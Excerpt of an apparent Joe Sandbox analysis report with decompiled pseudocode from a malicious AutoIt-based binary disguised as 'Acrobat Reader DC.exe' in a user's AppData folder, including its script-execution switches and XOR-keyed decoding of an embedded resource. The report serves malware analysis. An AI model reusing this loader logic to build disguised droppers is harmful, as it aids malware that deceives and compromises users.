                                  0x0046f0f4
                                  0x0046f0f8
                                  0x0046f0ff
                                  0x0046f100
                                  0x0046f105
                                  0x0046f108
                                  0x00000000
                                  0x0046f108
                                  0x0046f0bf
                                  0x0046f0c3
                                  0x0046f0ca
                                  0x0046f0cb
                                  0x0046f0d0
                                  0x0046f0d3
                                  0x00000000
                                  0x0046f0d3
                                  0x0046f08a
                                  0x0046f08e
                                  0x0046f095
                                  0x0046f096
                                  0x0046f09b
                                  0x0046f09e
                                  0x00000000
                                  0x0046f09e
                                  0x0046f055
                                  0x0046f059
                                  0x0046f060
                                  0x0046f061
                                  0x0046f066
                                  0x0046f069
                                  0x00000000
                                  0x0046f069
                                  0x0046f024
                                  0x0046f024
                                  0x0046f028
                                  0x0046f02b
                                  0x0046f034
                                  0x0046f035
                                  0x0046f039
                                  0x00000000
                                  0x0046f039
                                  0x0046eff7
                                  0x0046effb
                                  0x0046f004
                                  0x00000000
                                  0x0046f004
                                  0x0046ef86
                                  0x0046ef86
                                  0x0046ef89
                                  0x0046ef8b
                                  0x0046f2ab
                                  0x0046f2b4
                                  0x0046f2bd
                                  0x0046f2cd
                                  0x0046ef91
                                  0x0046ef91
                                  0x0046ef91
                                  0x0046ef94
                                  0x0046ef97
                                  0x0046ef9a
                                  0x0046ef9f
                                  0x0046efa3
                                  0x0046efa8
                                  0x0046efa9
                                  0x0046efa9
                                  0x0046efaa
                                  0x0046efaf
                                  0x0046efb2
                                  0x00000000
                                  0x0046efb8
                                  0x0046efbc
                                  0x0046efc5
                                  0x0046efce
                                  0x0046efde
                                  0x0046efde
                                  0x0046efb2
                                  0x0046ef8b
                                  0x0046ef84
                                  0x0046ef6a
                                  0x0046ef50
                                  0x00000000
                                  0x0046ef36
                                  0x0046ef00
                                  0x00000000
                                  0x0046eeec
                                  0x0046ee79
                                  0x0046ee81
                                  0x0046ee8a
                                  0x0046ee8e
                                  0x0046ee92
                                  0x0046ee95
                                  0x0046ee96
                                  0x0046ee97
                                  0x0046ee97
                                  0x0046eea0
                                  0x0046eea9
                                  0x0046eeb2
                                  0x0046eec2
                                  0x0046eec2
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                  • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                  • IsWindow.USER32(?), ref: 0046F29A
                                  • GetDesktopWindow.USER32 ref: 0046F356
                                  • EnumChildWindows.USER32 ref: 0046F35D
                                  • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                  • API String ID: 329138477-1919597938
                                  • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                  • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                  • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                  • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 91%
                                  			E00401F20(void* __ecx, void* __eflags, intOrPtr _a4, char _a7) {
				void* _v12;
				char _v16;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v80;
				struct HINSTANCE__* _v84;
				void* __edi;
				void* __esi;
				char _t68;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t100;
				intOrPtr* _t107;
				void* _t111;
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t127;
				void* _t148;
				intOrPtr* _t167;
				void* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_t177 = __eflags;
				_t159 =  &_v84;
				E0040E6E0( &_v84);
				_push(_a4);
				_v16 = 0;
				E00402560( &_v84, _t148, __eflags);
				GetModuleFileNameW(0, "C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104);
				_t68 = E00410100(0x4a7f6c,  &_v84, _t177); // executed
				_a7 = _t68;
				 *0x4a7f50 = 0x4a7f6c;
				E00410960(_t159,  &_v48,  &_v80);
				E00401B10(L"CMDLINERAW",  &_v32, _t177);
				E00401980(0, 1,  &_v48,  &_v32);
				E00402250( &_v32);
				E00408F40(L"CMDLINERAW",  &_v48);
				_t155 = L"CMDLINE";
				_v40 = 1;
				_v48 = 0;
				E00401B10(L"CMDLINE",  &_v32, _t177);
				E00401980(0, 0x100,  &_v48,  &_v32);
				E00402250( &_v32);
				E00401B10(L"CMDLINE",  &_v32, _t177);
				E0040C2C0(0,  &_v32,  &_v12,  &_v16);
				E00402250( &_v32);
				_t127 = _v56;
				E0040BC70( &_v32, _t177);
				E00401A10( &_v84,  &_v32,  &_v32);
				_t165 = _v32;
				_t85 = E004114AB(L"CMDLINE", L"/ErrorStdOut", _v32);
				_t171 = _t170 + 8;
				if(_t85 == 0) {
					 *0x4974e8 = 1;
					_t127 = _t127 - 1;
					E00401A10( &_v84,  &_v32, _t165);
					_t165 = _v32;
				}
				_t88 = E004114AB(_t155, L"/AutoIt3OutputDebug", _t165);
				_t172 = _t171 + 8;
				if(_t88 == 0) {
					 *0x4974e7 = 1;
					_t127 = _t127 - 1;
					E00401A10( &_v84,  &_v32, _t165);
					_t165 = _v32;
				}
				_t91 = E004114AB(_t155, L"/AutoIt3ExecuteLine", _t165);
				_t173 = _t172 + 8;
				if(_t91 == 0) {
					__eflags = _a7;
					 *0x4a7f58 = 1;
					 *0x4a7f54 = 0 | _a7 == 0x00000000;
					GetModuleFileNameW(0, "C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104);
					E00401A10( &_v84,  &_v32, _t165);
					E0040E0A0(0x4a7f5c,  &_v32);
					_t143 =  &_v32;
					_t127 = _t127 - 2;
					E00401A10( &_v84,  &_v32, 0x4a7f5c);
					_t165 = _v32;
				}
				_t100 = E004114AB(_t155, L"/AutoIt3ExecuteScript", _t165);
				_t174 = _t173 + 8;
				if(_t100 == 0) {
					if(_a7 != _t100) {
						 *0x4a7f54 = 0;
					} else {
						 *0x4a7f54 = 3;
					}
					E00401A10( &_v84,  &_v32, _t165);
					E00411567("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", _v32);
					_t174 = _t174 + 8;
					_t143 =  &_v32;
					_t127 = _t127 - 2;
					E00401A10( &_v84,  &_v32, _t165);
					_t165 = _v32;
				}
				if( *0x4a7f6c == 0) {
					E00411567("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", _t165);
					_t174 = _t174 + 8;
					_t143 =  &_v32;
					_t127 = _t127 - 1;
					E00401A10( &_v84,  &_v32, _t165);
				}
				if(_t127 < 0) {
					_t127 = 0;
				}
				_t156 = _v12;
				_push(_t127 + 1);
				E0040E830(_v12, _t143, 1);
				_push(0);
				_t107 = E0040CF00(_t143, _v12, 0, 1);
				_t175 = _t174 + 0x14;
				_t167 = _t107;
				E00408F40(_v12, _t167);
				 *((intOrPtr*)(_t167 + 8)) = 1;
				 *_t167 = _t127;
				if(_t127 > 0) {
					_t115 = 0;
					while(1) {
						_t116 = _t115 + 1;
						_push(_t116);
						_a4 = _t116;
						_t117 = E0040CF00(_t143, _v12, 0, 1);
						_t175 = _t175 + 0xc;
						_t156 =  &_v32;
						E0040E6A0(_t143, _t156, _t117);
						_t143 = _t156;
						E00401A10( &_v84, _t156, _t117);
						if(_a4 >= _t127) {
							goto L12;
						}
						_t115 = _a4;
					}
				}
				L12:
				E00402250( &_v32);
				_t111 = E004019D0(E00408F40(_t156,  &_v48),  &_v64);
				_v84 = 0;
				_v64 = 0x484eac;
				E004019D0(_t111,  &_v64);
				_push(_v60);
				E004111DC();
				return E00402250( &_v80);
			}


































                                  0x00401f20
                                  0x00401f29
                                  0x00401f2c
                                  0x00401f36
                                  0x00401f39
                                  0x00401f3c
                                  0x00401f4c
                                  0x00401f57
                                  0x00401f62
                                  0x00401f65
                                  0x00401f6f
                                  0x00401f7c
                                  0x00401f89
                                  0x00401f90
                                  0x00401f98
                                  0x00401f9d
                                  0x00401fa5
                                  0x00401fac
                                  0x00401faf
                                  0x00401fbe
                                  0x00401fc5
                                  0x00401fcd
                                  0x00401fdc
                                  0x00401fe3
                                  0x00401fe8
                                  0x00401fee
                                  0x00401ff9
                                  0x00401ffe
                                  0x00402007
                                  0x0040200c
                                  0x00402011
                                  0x00428b0b
                                  0x00428b12
                                  0x00428b13
                                  0x00428b18
                                  0x00428b18
                                  0x0040201d
                                  0x00402022
                                  0x00402027
                                  0x00428b26
                                  0x00428b2d
                                  0x00428b2e
                                  0x00428b33
                                  0x00428b33
                                  0x00402033
                                  0x00402038
                                  0x0040203d
                                  0x00428b3d
                                  0x00428b4f
                                  0x00428b56
                                  0x00428b5b
                                  0x00428b67
                                  0x00428b75
                                  0x00428b7a
                                  0x00428b80
                                  0x00428b83
                                  0x00428b88
                                  0x00428b88
                                  0x00402049
                                  0x0040204e
                                  0x00402053
                                  0x00402058
                                  0x00428b90
                                  0x0040205e
                                  0x0040205e
                                  0x0040205e
                                  0x0040206e
                                  0x0040207c
                                  0x00402081
                                  0x00402084
                                  0x0040208a
                                  0x0040208d
                                  0x00402092
                                  0x00402092
                                  0x0040209d
                                  0x00428ba5
                                  0x00428baa
                                  0x00428bad
                                  0x00428bb3
                                  0x00428bb4
                                  0x00428bb4
                                  0x004020a5
                                  0x00428bc6
                                  0x00428bc6
                                  0x004020ab
                                  0x004020b1
                                  0x004020b6
                                  0x004020bb
                                  0x004020c1
                                  0x004020c6
                                  0x004020c9
                                  0x004020cb
                                  0x004020d0
                                  0x004020d7
                                  0x004020db
                                  0x004020dd
                                  0x004020df
                                  0x004020e2
                                  0x004020e3
                                  0x004020e8
                                  0x004020eb
                                  0x004020f0
                                  0x004020f3
                                  0x004020f8
                                  0x004020fd
                                  0x00402102
                                  0x0040210a
                                  0x00000000
                                  0x00000000
                                  0x00428bbe
                                  0x00428bbe
                                  0x004020df
                                  0x00402110
                                  0x00402113
                                  0x00402123
                                  0x00402128
                                  0x0040212f
                                  0x00402136
                                  0x0040213e
                                  0x0040213f
                                  0x00402155

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • __wcsicoll.LIBCMT ref: 00402007
                                  • __wcsicoll.LIBCMT ref: 0040201D
                                  • __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                  • __wcsicoll.LIBCMT ref: 00402049
                                  • _wcscpy.LIBCMT ref: 0040207C
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104), ref: 00428B5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe$CMDLINE$CMDLINERAW
                                  • API String ID: 3948761352-1298289597
                                  • Opcode ID: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                  • Opcode Fuzzy Hash: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 87%
                                  			E00452719(void* __eflags, signed int _a4, intOrPtr _a8, char _a12) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v548;
				char _v1076;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				void* _t52;
				void* _t54;
				signed int _t59;
				void* _t63;
				void* _t64;
				intOrPtr* _t89;
				void* _t90;
				void* _t91;
				void* _t93;
				void* _t96;
				void* _t97;

				_t99 = __eflags;
				_t89 = _a4;
				_v8 = 0;
				while(1) {
					E00414D04( &_v16, 1, 4,  *_t89);
					E0044AFEF( &_v16, _t99,  &_v16, 4, 0x18ee);
					_v12 = 0;
					_t37 = E00414D30( &_v16, "FILE");
					_t93 = _t91 + 0x18;
					_t100 = _t37;
					if(_t37 != 0) {
						break;
					}
					_v8 = _v8 + 1;
					E00414D04( &_a4, 4, 1,  *_t89);
					_t83 = _a4 ^ 0x0000adbc;
					_t63 = (_a4 ^ 0x0000adbc) + (_a4 ^ 0x0000adbc);
					E00414D04( &_v548, 1, _t63,  *_t89);
					E0044AFEF( &_v548, _t100,  &_v548, _t63, _t83 + 0xb33f);
					 *((short*)(_t90 + _t63 - 0x220)) = 0;
					E00411567( &_v1076,  &_v548);
					E00414D04( &_a4, 4, 1,  *_t89);
					_t86 = _a4 ^ 0x0000f820;
					_t64 = (_a4 ^ 0x0000f820) + (_a4 ^ 0x0000f820);
					E00414D04( &_v548, 1, _t64,  *_t89);
					E0044AFEF( &_v548, _t100,  &_v548, _t64, _t86 + 0xf479);
					_t23 =  &_a12; // 0x452944
					 *((short*)(_t90 + _t64 - 0x220)) = 0;
					E00411567( *_t23,  &_v548);
					_t88 = _a8;
					_t79 =  &_v1076;
					_t52 = E0041313C( &_v1076, _a8);
					_t96 = _t93 + 0x58;
					if(_t52 == 0) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						_t54 = E0041313C(_t88, "*");
						_t97 = _t96 + 8;
						if(_t54 != 0) {
							L5:
							_push(1);
							_push(1);
							_push( *_t89); // executed
							E004150D1(_t64, _t79, _t88, _t89, _t99); // executed
							_t30 =  &_v20; // 0x452944
							E00414D04(_t30, 4, 1,  *_t89);
							_t31 =  &_v20; // 0x452944
							_t59 =  *_t31 ^ 0x000087bc;
							_v20 = _t59;
							_push(1);
							_push(_t59 + 0x18);
							_push( *_t89); // executed
							E004150D1(_t64, _t30, _t88, _t89, _t99); // executed
							_t91 = _t97 + 0x28;
							continue;
						} else {
							_t99 = _v8 - _t54;
							if(_v8 == _t54) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
					L8:
				}
				return 6;
				goto L8;
			}

























                                  0x00452719
                                  0x00452724
                                  0x00452728
                                  0x0045272f
                                  0x0045273e
                                  0x00452751
                                  0x0045275f
                                  0x00452763
                                  0x00452768
                                  0x0045276b
                                  0x0045276d
                                  0x00000000
                                  0x00000000
                                  0x00452775
                                  0x00452780
                                  0x0045278b
                                  0x00452791
                                  0x0045279e
                                  0x004527b5
                                  0x004527ca
                                  0x004527d2
                                  0x004527e2
                                  0x004527ed
                                  0x004527f3
                                  0x00452800
                                  0x00452817
                                  0x0045281c
                                  0x00452829
                                  0x00452831
                                  0x00452836
                                  0x00452839
                                  0x00452841
                                  0x00452846
                                  0x0045284b
                                  0x004528a4
                                  0x004528a4
                                  0x004528ac
                                  0x0045284d
                                  0x00452853
                                  0x00452858
                                  0x0045285d
                                  0x00452864
                                  0x00452866
                                  0x00452868
                                  0x0045286a
                                  0x0045286b
                                  0x00452878
                                  0x0045287e
                                  0x00452883
                                  0x00452886
                                  0x0045288b
                                  0x00452891
                                  0x00452893
                                  0x00452896
                                  0x00452897
                                  0x0045289c
                                  0x00000000
                                  0x0045285f
                                  0x0045285f
                                  0x00452862
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00452862
                                  0x0045285d
                                  0x00000000
                                  0x0045284b
                                  0x004528ba
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_fseek_wcscpy
                                  • String ID: D)E$D)E$FILE
                                  • API String ID: 3888824918-361185794
                                  • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                  • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 87%
                                  			E0040E360(intOrPtr __eax, void* __ecx, void* __eflags) {
				char _v524;
				char _v1052;
				short _v1580;
				char _v1596;
				short _v1598;
				short _v1600;
				void* __edi;
				void* __esi;
				intOrPtr _t37;
				intOrPtr _t44;
				signed int _t45;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int _t55;
				signed int _t63;
				short* _t65;
				intOrPtr _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t89;
				intOrPtr _t93;
				intOrPtr _t94;
				void* _t95;
				void* _t96;
				void* _t98;
				signed int _t103;
				void* _t107;
				void* _t108;

				_t109 = __eflags;
				_push(_t98);
				_push(_t95);
				_push(0x400);
				 *0x4a90e8 = 0;
				 *0x4a90ec = __eax;
				 *0x4a90f0 = 0;
				 *0x4a90f4 = 0;
				 *0x4a90f8 = 0;
				 *0x4a90fc = 0;
				 *0x4a9100 = 0x485a88;
				 *0x4a9104 = 0;
				 *0x4a9108 = 0;
				 *0x4a910c = 0;
				 *0x4a9110 = 0x485a88;
				 *0x4a9114 = 0;
				 *0x4a9118 = 0;
				 *0x4a911c = 0;
				 *0x4a9124 = 0;
				 *0x4a912c = 0;
				 *0x4a9130 = 0x66; // executed
				_t37 = E004115D7(_t95, _t98, __eflags); // executed
				 *0x4a9120 = _t37;
				GetModuleFileNameW(0,  &_v1580, 0x104);
				E00413A0E( &_v1580,  &_v524,  &_v1052, 0, 0);
				E00413A5A( &_v1052, L"Include", 0x104);
				E00413A9E( &_v1580,  &_v524,  &_v1052, 0, 0);
				_push(0x20a);
				_t44 = E004115D7(_t95, _t98, _t109);
				_t89 =  *0x4a9124; // 0x1
				_t75 =  *0x4a9120; // 0xa56d30
				 *((intOrPtr*)(_t75 + _t89 * 4)) = _t44;
				_t45 =  *0x4a9124; // 0x1
				_t76 =  *0x4a9120; // 0xa56d30
				 *0x4a9124 = _t45 + 1;
				E00411567( *((intOrPtr*)(_t76 + _t45 * 4)),  &_v1580);
				_t107 = (_t103 & 0xfffffff8) - 0x63c + 0x44;
				E0040BC70( &_v1596, _t109);
				_t49 = E0040E4C0( &_v1596, _t109); // executed
				if(_t49 != 0) {
					_t96 = 0;
					__eflags = 0;
					_v1580 = 0;
					while(1) {
						_t100 =  &_v1596;
						_v1600 =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
						_v1598 = 0;
						__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
						if(__eflags == 0) {
							goto L6;
						}
						L4:
						_t65 = E00401C90(_t96, _t100, __eflags);
						__eflags =  *_t65 - 0x3b;
						if( *_t65 == 0x3b) {
							goto L6;
						}
						E00411536( &_v1580,  &_v1600);
						_t107 = _t107 + 8;
						_t96 = _t96 + 1;
						while(1) {
							_t100 =  &_v1596;
							_v1600 =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
							_v1598 = 0;
							__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
							if(__eflags == 0) {
								goto L6;
							}
							goto L4;
						}
						L6:
						_t53 = E004111C1( &_v1580);
						_t108 = _t107 + 4;
						__eflags = _t53;
						if(__eflags != 0) {
							_t63 = E004111C1( &_v1580);
							_t108 = _t108 + 4;
							__eflags =  *((short*)(_t108 + 0x1e + _t63 * 2)) - 0x5c;
							if(__eflags != 0) {
								E00411536( &_v1580, "\\");
								_t108 = _t108 + 8;
							}
						}
						_push(0x20a);
						_t54 = E004115D7(_t96, _t100, __eflags);
						_t80 =  *0x4a9124; // 0x1
						_t93 =  *0x4a9120; // 0xa56d30
						 *((intOrPtr*)(_t93 + _t80 * 4)) = _t54;
						_t55 =  *0x4a9124; // 0x1
						_t94 =  *0x4a9120; // 0xa56d30
						 *0x4a9124 = _t55 + 1;
						E00412FBA( *((intOrPtr*)(_t94 + _t55 * 4)),  &_v1580, 0x104);
						_t107 = _t108 + 0x10;
						_v1580 = 0;
						__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
						if(__eflags == 0) {
							goto L1;
						} else {
							_t96 = _t96 + 1;
							continue;
						}
					}
				}
				L1:
				E00402250( &_v1596);
				return 0x4a90e8;
			}
































                                  0x0040e360
                                  0x0040e36f
                                  0x0040e370
                                  0x0040e371
                                  0x0040e376
                                  0x0040e37c
                                  0x0040e381
                                  0x0040e387
                                  0x0040e38d
                                  0x0040e393
                                  0x0040e399
                                  0x0040e3a3
                                  0x0040e3a9
                                  0x0040e3af
                                  0x0040e3b5
                                  0x0040e3bf
                                  0x0040e3c5
                                  0x0040e3cb
                                  0x0040e3d1
                                  0x0040e3d7
                                  0x0040e3dd
                                  0x0040e3e7
                                  0x0040e3fa
                                  0x0040e3ff
                                  0x0040e41c
                                  0x0040e433
                                  0x0040e44f
                                  0x0040e454
                                  0x0040e459
                                  0x0040e45e
                                  0x0040e464
                                  0x0040e46a
                                  0x0040e46d
                                  0x0040e472
                                  0x0040e482
                                  0x0040e487
                                  0x0040e48c
                                  0x0040e493
                                  0x0040e49c
                                  0x0040e4a3
                                  0x00427501
                                  0x00427503
                                  0x00427505
                                  0x0042750a
                                  0x0042750a
                                  0x00427518
                                  0x0042751d
                                  0x00427527
                                  0x0042752a
                                  0x00000000
                                  0x00000000
                                  0x0042752c
                                  0x0042752c
                                  0x00427531
                                  0x00427535
                                  0x00000000
                                  0x00000000
                                  0x00427541
                                  0x00427546
                                  0x00427549
                                  0x0042750a
                                  0x0042750a
                                  0x00427518
                                  0x0042751d
                                  0x00427527
                                  0x0042752a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042752a
                                  0x0042754c
                                  0x00427551
                                  0x00427556
                                  0x00427559
                                  0x0042755b
                                  0x00427562
                                  0x00427567
                                  0x0042756a
                                  0x00427570
                                  0x0042757c
                                  0x00427581
                                  0x00427581
                                  0x00427570
                                  0x00427584
                                  0x00427589
                                  0x0042758e
                                  0x00427594
                                  0x0042759a
                                  0x0042759d
                                  0x004275a2
                                  0x004275ac
                                  0x004275bc
                                  0x004275c3
                                  0x004275ca
                                  0x004275d4
                                  0x004275d7
                                  0x00000000
                                  0x004275dd
                                  0x004275dd
                                  0x00000000
                                  0x004275dd
                                  0x004275d7
                                  0x0042750a
                                  0x0040e4a9
                                  0x0040e4ad
                                  0x0040e4bd

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcsncat.LIBCMT ref: 0040E433
                                  • __wmakepath.LIBCMT ref: 0040E44F
                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • _wcscpy.LIBCMT ref: 0040E487
                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • _wcscat.LIBCMT ref: 00427541
                                  • _wcslen.LIBCMT ref: 00427551
                                  • _wcslen.LIBCMT ref: 00427562
                                  • _wcscat.LIBCMT ref: 0042757C
                                  • _wcsncpy.LIBCMT ref: 004275BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                  • String ID: Include$\
                                  • API String ID: 3173733714-3429789819
                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
